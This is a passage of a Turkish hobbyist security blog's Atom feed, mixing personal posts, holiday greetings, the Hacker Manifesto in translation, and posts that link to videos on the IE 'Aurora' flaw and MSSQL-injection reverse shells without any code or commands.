src='https://blogger.googleusercontent.com/tracker/2887209772609553434-7235142940267760120?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/7235142940267760120/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2010/07/tatil.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7235142940267760120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7235142940267760120'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2010/07/tatil.html' title='Tatil(!)'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-6693975924152670615</id><published>2010-01-21T11:43:00.000-08:00</published><updated>2010-01-21T11:47:38.065-08:00</updated><title type='text'>Microsoft Internet Explorer "Aurora" Memory Corruption Vulnerability</title><content type='html'>Uzun Zamandır Yazmadım Yazmadım Şimdi Yazıyorum :)&lt;br /&gt;&lt;br /&gt;Microsoft Internet Explorer "Aurora" Memory Corruption Vulnerability&lt;br /&gt;&lt;br /&gt;Zafiyet Internet Explorer 4 SP4 ten Başlayarak 8’e Kadar (Internet Explorer 5.01 Service Pack 4 for Microsoft Windows 2000 Service Pack 4 Hariç) Tüm Sürümleri Etkilemektedir. Zafiyetle Kurban Bilgisayarında Uzaktan Kod Çalıştırılabilir. Zafiyetin Kullanımıyla İlgili Aşağıda Video Çektim Yalnız Metasploit’teki Exploit Sadece IE 6 Sürümlerinde Çalışmaktadır. Zafiyet Hakkında Detaylı ve İstismar Edilen IE Sürümlerini Öğrenmek İçin &lt;a href="http://www.microsoft.com/technet/security/advisory/979352.mspx"&gt;Buraya&lt;/a&gt; Tıklayınız.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249"&gt;NVD&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.securityfocus.com/bid/37815/exploit"&gt;SecurityFocus&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Video ;&lt;br /&gt;&lt;object width="500" height="350"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8888643&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=8888643&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="500" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Zafiyeti Gidermek İçin;&lt;br /&gt;Microsoft’un Yayınladığı Yamayı Kurmanız Yeterli. Yama Sayfasına Ulaşmak İçin &lt;a href="http://support.microsoft.com/kb/979352"&gt;Buraya&lt;/a&gt; Tıklayınız.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-6693975924152670615?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/6693975924152670615/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2010/01/microsoft-internet-explorer-aurora.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/6693975924152670615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/6693975924152670615'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2010/01/microsoft-internet-explorer-aurora.html' title='Microsoft Internet Explorer &quot;Aurora&quot; Memory Corruption Vulnerability'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-8181132459806680038</id><published>2009-11-28T05:59:00.000-08:00</published><updated>2009-11-28T06:00:56.826-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Bayram Tebriği</title><content type='html'>Merhabalar&lt;br /&gt;Tüm İslam Aleminin ve Blog Takipçilerimin(!) Kurban Bayramı Mübarek Olsun. Yedikleri Etler Kan ve Can Olsun :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-8181132459806680038?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/8181132459806680038/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/11/bayram-tebrigi.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/8181132459806680038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/8181132459806680038'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/11/bayram-tebrigi.html' title='Bayram Tebriği'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-5863669780124597694</id><published>2009-10-20T10:24:00.000-07:00</published><updated>2009-10-20T10:27:08.942-07:00</updated><title type='text'>Hacker Manifestosu</title><content type='html'>Benim Çok Hoşuma Giden Bir Yazı Ama Nedense Blog'da Yazmak Bugün Aklıma Geldi :)&lt;br /&gt;&lt;br /&gt;-----------------&lt;br /&gt;&lt;br /&gt;Bugün bir diğeri daha yakalandı.Boydan boya gazetelerdeydi''Bilgisayar suçu skandalında bir delikanlı tutuklandı''.''Banka hasarından sonra bir hacker tutuklandı''...&lt;br /&gt;&lt;br /&gt;Lanet olası çocuklar.Hepsi birbirinin aynı.&lt;br /&gt;&lt;br /&gt;Ama siz üç-parçalı psikolajinizle ve 1950'lerden kalma teknobeyninizle hiç bir hacker'ın gözlerinin arkasından baktınız mı?Onu bu kadar sert yapan,onu buna zorlayan,onu böylesine bir kalıbakalıba döken neydi diyehiç merak ettinniz mi?&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;Ben bir hacker'ım, dünyama buyrun...&lt;br /&gt;&lt;br /&gt;Benim dünyam okul ile başlıyor...Birçok çocuktan daha akıllıyım, bize öğrettikleri bu saçmalık beni sıkıyor...&lt;br /&gt;&lt;br /&gt;Lanet olası başarısızlar.Hepsi birbirinin aynı.&lt;br /&gt;&lt;br /&gt;Orta okulda veya lisedeydim.Hocaların bir kesiri nasıl indirgendiğini anlatışlarını on beşici kez dinlemiştim.Onu anladım.''Hayır,Bay Smith, size ödevimi göstermedim, ben onu kafamdan yaptım...''&lt;br /&gt;&lt;br /&gt;Lanet olası çocuk.Muhtemelen kopya çekti.Hepsi birbirinin aynı.&lt;br /&gt;&lt;br /&gt;Bugün bir keşif yaptım.Bir bilgisayar buldum.Bir saniye,bu çok enteresan.Ne yapmasını istersem onu yapıyor.Eğer hata yaprsa,onu ben beceremediğimdendir.&lt;br /&gt;Beni sevmediğinden değil...veya benden korktuğundan değil...veya benim çok akıllı bir fırlama olduğumu düşündüğünden değil... veya öğretmeyi sevmediğimden ve burada olmaması gerektiğini düşşündüğünden değil...&lt;br /&gt;&lt;br /&gt;Lanet olası çocuk.Bütün yaptığı oyun oynamak.Hepsi birbirinin aynı.&lt;br /&gt;&lt;br /&gt;Ve sonra oldu...''İşte bu...Benim ait olduğum yer burası...''Buradaki herkesi biliyorum...Onlarla hiç karşılaşmamış,hiç konuşmamış,onlardan bir daha ses çıkmayacak olsa dahi...Hepinizi tanıyorum...&lt;br /&gt;&lt;br /&gt;Lanet olası çocuk.Telefon hattını yine meşgul ediyor.Hepsi birbirinin aynı.&lt;br /&gt;&lt;br /&gt;İnanamayacaksınız ama hepimiz birbirimizin aynısıyız...Bizler okulda terslendik.Öğretecek birşeyleri olan azı bizi istekli öğrenciler olarak buldu.Fakat bu azı çöldeki damlacıklar gibiydi.&lt;br /&gt;&lt;br /&gt;Bu bizim dünyamız şimdi...elekronun ve elektrik düğmesinin dünyası,bilgi aktarım hızının güzelliği.Karcı oburlar tarafından yönetilmeseydi pul kadar ucuz olabilecek, zaten var olan bir sistemi kullanılır hale getirdik ve siz bizi suçlu olarak ifşa ettiniz.Biz araştırdık...ve siz bize suçlu dediniz.Bilgiyi aradık...ve siz bize suçlu dediniz.Biz tenimizin rengi olmadan varolduk,milliyetsiz,hiç bir dine ait olmadan...ve siz bize suçlu dediniz.Atom bombası ürettiniz,savaşlara girdiniz,cinayet işlediniz,hile yaptınız ve bize yalan söylediniz ve bunların bizim yararımıza olduğuna inanmamızı sağlamaya çalıştınız ve biz hala suçluyuz.&lt;br /&gt;&lt;br /&gt;Evet,ben suçluyum.Suçum merakımın bir parçası.Benim suçum insanları söyledikleri ve düşündüklerine göre yargılamak neye benzediklerine göre değil.Benim suçum sizleri daha akılcı kılmaktı,ki bu nedenden dolayı beni hiç bir zaman affetmiyeceksi- niz.&lt;br /&gt;&lt;br /&gt;Ben bir hacker'ım ve bu benim manifestom.Bu bireyi durdurabilirsiniz ama hepimizi durduramazsınız...hepimizden öte, hepimiz birbirimize benziyoruz.&lt;br /&gt;&lt;br /&gt;The Mentor(8 Ocak 1986)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-5863669780124597694?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/5863669780124597694/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/10/hacker-manifestosu.html#comment-form' title='3 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5863669780124597694'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5863669780124597694'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/10/hacker-manifestosu.html' title='Hacker Manifestosu'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-5511583362697483426</id><published>2009-09-26T12:45:00.000-07:00</published><updated>2009-09-26T12:46:36.224-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='guvenlik'/><title type='text'>Saldırılarda Uygulamalar Hedefleniyor</title><content type='html'>İnternet'teki, zaafiyetleri irdeleyen bir araştırma, aslında tehditlerin pek de tahmin edilmeyen yerlerden gelebildiğini ortaya koyuyor.&lt;br /&gt;&lt;br /&gt;Bilişim güvenlik eğitimi veren SANS Institute'ün bir araya getirdiği yakın tarihli araştırma, bilgi işlem müdürlerinin güvenlik önceliklerini sürekli yenilemeleri gerektiğine işaret ediyor. Risk değerlendirme şirketleri Tipping Point ve Qualys'in, 15 bin kuruluşu içine alan araştırması, sanılanın aksine saldırıların işletim sistemlerini değil, daha çok gerekli korumadan yoksun uygulamaları hedef aldığını gösteriyor. Bu, gerekli yamaların zamanında yapılması gereğini ortaya koyuyor.&lt;br /&gt;&lt;br /&gt;Araştırmalar, kimi zaman şirketlerin kullandıkları işletim sistemlerindeki zaafiyetlere odaklanırken, uygulamaları gözden kaçırabildiklerine işaret ediyor. Yani, bir başka değişle esas koruma altına alınması gereken alan zayıf bırakılırken, saldırganların hedeflemedikleri işletim sistemleri kalın güvenlik duvarlarıyla korunuyor. Oysa, hatırda tutulması gereken hackerların kurumsal ve bireysel kullanıcıların davranışlarını sürekli izledikleri. Hackerlar, son zamanlarda işletim sistemlerine sürekli yama geliştirildiğini biliyorlar.&lt;br /&gt;&lt;br /&gt;Bir diğer güvenlik önceliğini de web sunucuları üzerinde koşan uygulamalar oluşturuyor. Araştırmalar, tüm saldırıların yüzde 60'ının, bu tür web üzerinde paylaşılan uygulamalar aracılığıyla gerçekleştirildiğini gösteriyor. Uzmanlar, bu her iki tür saldırının da kullanıcılar için çok ciddi sonuçlar doğurabileceğini ifade ediyorlar. En çok hedef alınan uygulamalar arasında; Flash Playe, Acrobat Reader, Java, QuickTime'ın adları geçiyor.&lt;br /&gt;&lt;br /&gt;Kaynak:turk.internet.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-5511583362697483426?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/5511583362697483426/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/09/saldirilarda-uygulamalar-hedefleniyor.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5511583362697483426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/5511583362697483426'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/09/saldirilarda-uygulamalar-hedefleniyor.html' title='Saldırılarda Uygulamalar Hedefleniyor'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-3104139907312957834</id><published>2009-09-13T12:17:00.000-07:00</published><updated>2009-09-13T12:21:43.914-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><title type='text'>Kaç Gün Geçti Aradan ? :)</title><content type='html'>Uzun Zamandır Blog'la Uğraşmıyorum (Sanırım 1.5 Ay Falan) Blog Her Ne Kadar Yeni Olsada Günlük Tekil Ziyaretçim 10dan Fazla (Sanki Çokmuş Gibi Ama Mutlu Ediyor :P Bazen Ufak Şeylerdende Mutlu Olmak Gerekiyor.) Bu Aralar Ne mi Yapıyorum Aslında Yaptığım Pek Birşey Yok Herşey Aynı Eskiden Linux Hastasıydım Bu Aralar Tekrar Merak Sardım ve Ubuntu (mmmm Tadından Yenmez) Kurdum 1-2 Hafta sonra Eski Formuma Kavuşacağıma İnanıyorum Başkaaa ha Birde Müzik Dinlemeye Her Zamanki Gibi Devam :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-3104139907312957834?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/3104139907312957834/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/09/kac-gun-gecti-aradan.html#comment-form' title='3 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/3104139907312957834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/3104139907312957834'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/09/kac-gun-gecti-aradan.html' title='Kaç Gün Geçti Aradan ? :)'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-2981538275376464059</id><published>2009-07-08T09:40:00.000-07:00</published><updated>2009-07-08T09:44:38.049-07:00</updated><title type='text'>Yalnızlık</title><content type='html'>Anlatacaklarım var!&lt;br /&gt;Vaaz vermek değil niyetim, duyduğumu söylemek.&lt;br /&gt;Söylemeye değer şeyler duyuyorum zira….&lt;br /&gt;Belki hayatı daha yaşanır kılmak için ya da belki sade, ama sade anlatmak için…&lt;br /&gt;Sen anlat dedi Tanrı bana, anlaşılsın diye değil, hiçbir mükafat istemeden anlat…&lt;br /&gt;Çünkü bir mükafattır artık bir anlatıcıya doğru düzgün anlaşılmak!&lt;br /&gt;&lt;br /&gt;Sen anlat dedi…&lt;br /&gt;Sen sade anlat!&lt;br /&gt;Umudu hatırlatsın diye umutsuzluğu, çareye yol açsın diye çaresizliği anlat…&lt;br /&gt;Ders verme dedi kimseye, çünkü hoca denmez öğrenmesini bitirene.&lt;br /&gt;Çırakları olan bir çıraktır usta, olsa olsa…&lt;br /&gt;Sen anlat dedi bana Tanrı, sen sade anlat…&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Küçükken herkes akıllı, ben aptalım sanırdım.&lt;br /&gt;Biraz büyüdüm; herkes aptal ben akıllıyım sandım.&lt;br /&gt;Uzun zaman önce; “herkes kör, bir ben mi görüyorum?” diye sordum.&lt;br /&gt;Akabinde; “bir ben görüyor, bir ben duyuyor olamam!” dedim, sorguladım.&lt;br /&gt;Şimdi ise; sayesinde, hakikatin neresinde durdugumun farkındayım….&lt;br /&gt;Hatırladım…&lt;br /&gt;&lt;br /&gt;Hiç kitap okumayan bir adam niçin merak eder seneye yazılacak kıtapları?&lt;br /&gt;Bu dünyada bile yaşamayi beceremeyen niçin merak eder diğer gezegenlerdeki hayatı?&lt;br /&gt;Geçmiş ve bugün ne zaman bitirildi de gelecek sorgulanıyor?…&lt;br /&gt;İşler hala kalleşçe hallediliyor ikili ve uluslararasi ilişkilerde…&lt;br /&gt;Her ülkenin sınır komşuları dost ve kardeş düşman ülkeler…&lt;br /&gt;Doğru düzgün top bile oynayamıyorlar kavgasız!&lt;br /&gt;Oyunları savaş gibi görenler savaşı da oyun gibi görüyor elbet…&lt;br /&gt;Aynı kadına sevdalananlar birbirini vuruyor, aynı şeyden nefret edenler can ciger arkadaş…&lt;br /&gt;Bir şeyi, bir kadını, bir erkeği ya da bir ülkeyi sevmenin cezası ölüm bile olabiliyor bazı…&lt;br /&gt;&lt;br /&gt;Gerisi de videoda Altan Erkekli’nin müthiş oyunculuğuyla…&lt;br /&gt;&lt;div&gt;&lt;object width="480" height="381"&gt;&lt;param name="movie" value="http://dailymotion.virgilio.it/swf/x932bv_yalnyzlyk-cok-guzel-altan-erkekli_people&amp;related=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://dailymotion.virgilio.it/swf/x932bv_yalnyzlyk-cok-guzel-altan-erkekli_people&amp;related=1" type="application/x-shockwave-flash" width="480" height="381" allowFullScreen="true" allowScriptAccess="always"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kendinigelistir.com/yalnizlik/"&gt;Kaynak&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-2981538275376464059?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/2981538275376464059/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/07/yalnizlik.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/2981538275376464059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/2981538275376464059'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/07/yalnizlik.html' title='Yalnızlık'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-7143930366969520546</id><published>2009-07-01T04:55:00.000-07:00</published><updated>2009-07-01T06:01:27.353-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='reverse'/><category scheme='http://www.blogger.com/atom/ns#' term='kendimden'/><category scheme='http://www.blogger.com/atom/ns#' term='mssql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='mssql'/><category scheme='http://www.blogger.com/atom/ns#' term='sqlinjection'/><title type='text'>MSSQL Injection Reverse Shell</title><content type='html'>Merhaba&lt;br /&gt;Birkaç Gündür Blog'a Yazı Yazmıyorum Gerek Bunun İntikamı Gerekse 4-5 Ay Önce Uğraştığım Ama Eringenliğim Sayesinde(!) Ancak 2 Gün Önce Video Çekebildiğim SQL Injection İle MSSQL Veritabanlarında Reverse Shell'e Düşme Olayını Anlattım. İyi Seyirler :)&lt;br /&gt;&lt;object width="580" height="400" class="BLOG_video_class" id="BLOG_video-5248317656d72d86" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"&gt;&lt;param name="movie" value="http://www.youtube.com/get_player"&gt;&lt;param name="bgcolor" value="#FFFFFF"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;param name="flashvars" value="flvurl=http://v11.nonxt3.googlevideo.com/videoplayback?id%3D5248317656d72d86%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331854949%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D677A30988869ED097984C30FBC69ACB86F4715D9.F08A13CF6266A00923C89F8A6FD2466F74BF7D6%26key%3Dck1&amp;amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3D5248317656d72d86%26offsetms%3D5000%26itag%3Dw160%26sigh%3Dm8fqXPtfJgl6kpXJwz0Fdqe-G3o&amp;amp;autoplay=0&amp;amp;ps=blogger"&gt;&lt;embed src="http://www.youtube.com/get_player" type="application/x-shockwave-flash"width="580" height="400" bgcolor="#FFFFFF"flashvars="flvurl=http://v11.nonxt3.googlevideo.com/videoplayback?id%3D5248317656d72d86%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331854949%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D677A30988869ED097984C30FBC69ACB86F4715D9.F08A13CF6266A00923C89F8A6FD2466F74BF7D6%26key%3Dck1&amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3D5248317656d72d86%26offsetms%3D5000%26itag%3Dw160%26sigh%3Dm8fqXPtfJgl6kpXJwz0Fdqe-G3o&amp;autoplay=0&amp;ps=blogger"allowFullScreen="true" /&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Videoyu İzlemek İçin Vimeo Linki : &lt;a href="http://www.vimeo.com/5406792"&gt;http://www.vimeo.com/5406792&lt;/a&gt;&lt;br /&gt;İyi Seyirler ve Eğlenceler :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-7143930366969520546?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='video/mp4' href='http://www.blogger.com/video-play.mp4?contentId=5248317656d72d86&amp;type=video%2Fmp4' length='0'/><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/7143930366969520546/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/07/mssql-injection-reverse-shell.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7143930366969520546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7143930366969520546'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/07/mssql-injection-reverse-shell.html' title='MSSQL Injection Reverse Shell'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-7807671959631021729</id><published>2009-06-25T11:45:00.001-07:00</published><updated>2009-06-25T11:47:07.731-07:00</updated><title type='text'>Regaib Kandiliniz Mübarek Olsun</title><content type='html'>"Recep ayı Allah’ın ayı, Şaban benim ayım, Ramazan da ümmetimin ayıdır." (Aclûnî, Keşfu’l-Hafâ, 1/423)&lt;br /&gt;&lt;br /&gt;Regaib Kandiliniz Mübarek Olsun.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-7807671959631021729?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/7807671959631021729/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/06/regaib-kandiliniz-mubarek-olsun.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7807671959631021729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/7807671959631021729'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/06/regaib-kandiliniz-mubarek-olsun.html' title='Regaib Kandiliniz Mübarek Olsun'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-5772192745104844679</id><published>2009-06-23T04:42:00.000-07:00</published><updated>2009-06-23T04:47:30.984-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='penetration'/><title type='text'>Penetration Tester Olmak</title><content type='html'>Daha önceden pek çok kişi zaten söyledi güvenlikçi olmak sadece birkaç teknik konuyu iyi bilmek ya da birkaç kitap okumak değil daha çok beynin nasıl çalıştığı, bir soruna nasıl yaklaşıldığı ve olaylara bakış açısı ile ilgili. Bunun yanında bir çok başka meslekte de gerektiği gibi gündemi takip etme, odaklanma ve havadaki kokuları alabilme de gerekli meziyetlerden.&lt;br /&gt;&lt;br /&gt;Bir güvenlik uzmanının ya da daha spesifik olarak penetration tester’ ın bir dizi özelliğe ihtiyacı var. Bu özelliklerin bir kısmı teknik, ve teknik şeyler öğrenilebilir ama bir kısmı da doğuştan gelen huylar ve muhtemelen ne yaparsanız yapın öğrenemeyeceğiniz ya da gerçekten öğrenmesi seneler sürecek şeyler.&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;Konuyu burada hemen “güvenlikçi oılunmaz, güvenlikçi doğulur(!)” a bağlamak istemiyorum, çünkü durum bu değil. İddialara göre Mehmet Akif Ersoy demiş ki “Şiirin %5 ilham, %95 çalışmaktır”. Ben de bu şekilde düşünüyorum, dolayısıyla %5 + %95 e erişince Mehmet Akif Ersoy olunuyor.&lt;br /&gt;&lt;br /&gt;Yazacaklarımın bazıları gerçekten ölümcül bazıları ise sadece işinizde daha iyi olmanızı sağlayacak şeyler.&lt;br /&gt;&lt;br /&gt;    * Güvenlikçi Olarak Yaşamak, Güvenlikçi Olarak Düşünmek&lt;br /&gt;          o 